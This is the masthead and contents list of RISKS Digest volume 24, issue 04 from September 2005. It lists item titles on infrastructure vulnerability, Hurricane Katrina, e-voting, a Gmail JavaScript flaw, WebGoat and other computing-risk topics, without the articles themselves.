[RISKS] Risks Digest 24.04

Date: Fri Sep 16 2005 - 16:06:49 PDT

RISKS-LIST: Risks-Forum Digest  Friday 16 September 2005  Volume 24 : Issue 04

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
  <http://catless.ncl.ac.uk/Risks/24.04.html>
The current issue can be found at
  <http://www.csl.sri.com/users/risko/risks.txt>

  Contents:
Nation's Critical Infrastructure Vulnerable to Cyber Attack (U.S. House
  Science Committee)
Katrina -- predictions before and response after (Inman Harvey)
Health Records Of Evacuees Go Online (Jonathan Krim)
One radio frequency for emergency services (Fred Cohen)
LA power outage (PGN)
Public Call for Skype to Release Specifications (Lauren Weinstein)
WebGoat 3.7 - Application Security hands-on learning environment
  (Jeff Williams)
National Academies/CSTB report on Electronic Voting (Herb Lin)
Gmail security flaw: acts on javascript in unopened e-mail (Suw Charman)
Re: Risks of REAL ID: incorrect (Steven M. Bellovin)
CardSystems Complies With Industry Standards (Curt Sampson)
REVIEW: "Forensic Discovery", Dan Farmer/Wietse Venema (Rob Slade)
Abridged info on RISKS (comp.risks)